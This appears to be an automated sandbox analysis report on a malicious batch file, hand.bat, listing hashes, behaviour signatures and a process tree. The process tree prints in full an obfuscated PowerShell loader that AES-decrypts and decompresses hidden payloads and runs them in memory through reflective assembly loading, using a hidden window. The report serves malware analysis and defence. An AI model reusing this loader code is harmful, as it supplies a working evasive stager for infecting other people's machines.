Analysis
-
max time kernel
5s -
max time network
11s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
-
submitted
19-11-2024 21:24
General
-
Target
hand.bat
-
Size
7.0MB
-
MD5
1a013c7ac90b58073895b26cae70def7
-
SHA1
60c9c3294fc7ac3d336a478274f62f4818498230
-
SHA256
698b1f0a35a76e57adef388612b29902f86f56983c772d7c6c17b4483c2be688
-
SHA512
c1bbb52e8546b352e041e944d7dfa158d5dc9a51b1628128d345e4a9e708871d7a1f5e59cc44a2c66f8dc9af81ec06e1b5105d5a7292497075564496f3b0ec75
-
SSDEEP
49152:vZrlGoT+Xts/LJjeDPnIwT0ZFBZP2x3fLKs0HMb0DprNMiKwPjp9Kw2EdF8d7nrx:Y
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of WriteProcessMemory 4 IoCs
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\hand.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd.exe /c echo function iuYgv($leKgl){ $jPJwb=[System.Security.Cryptography.Aes]::Create(); $jPJwb.Mode=[System.Security.Cryptography.CipherMode]::CBC; $jPJwb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $jPJwb.Key=[System.Convert]::FromBase64String('uEpqIWQRyvODISCHGUQfxzSWFesSqTmCOTn7Muaq1uk='); $jPJwb.IV=[System.Convert]::FromBase64String('II7XtEw/4tOoxMX0yT4prg=='); $kNTLM=$jPJwb.CreateDecryptor(); $whegU=$kNTLM.TransformFinalBlock($leKgl, 0, $leKgl.Length); $kNTLM.Dispose(); $jPJwb.Dispose(); $whegU;}function zpxNq($leKgl){ Invoke-Expression '$kWPKo=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$leKgl);'.Replace('*', ''); Invoke-Expression '$UAPJw=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$SDRXH=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($kWPKo, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $SDRXH.CopyTo($UAPJw); $SDRXH.Dispose(); $kWPKo.Dispose(); $UAPJw.Dispose(); $UAPJw.ToArray();}function efQtH($leKgl,$kxxMo){ Invoke-Expression '$ECSjU=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$leKgl);'.Replace('*', ''); Invoke-Expression '$iUybu=$ECSjU.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$iUybu.*I*n*v*o*k*e*($null, $kxxMo);'.Replace('*', '');}$bdjtW = 'C:\Users\Admin\AppData\Local\Temp\hand.bat';$host.UI.RawUI.WindowTitle = $bdjtW;$sWPvP=[System.IO.File]::ReadAllText($bdjtW).Split([Environment]::NewLine);foreach ($fLYEN in $sWPvP) { if ($fLYEN.StartsWith('ECVXS')) { $GELOT=$fLYEN.Substring(5); break; }}$XQqqI=[string[]]$GELOT.Split('\');Invoke-Expression '$gOc = zpxNq (iuYgv ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($XQqqI[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$saB = zpxNq (iuYgv ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($XQqqI[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$UaX = zpxNq (iuYgv ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($XQqqI[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');efQtH $gOc $null;efQtH $saB $null;efQtH $UaX (,[string[]] (''));2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
8KB
-
Filesize
136KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
272KB
-
Filesize
472KB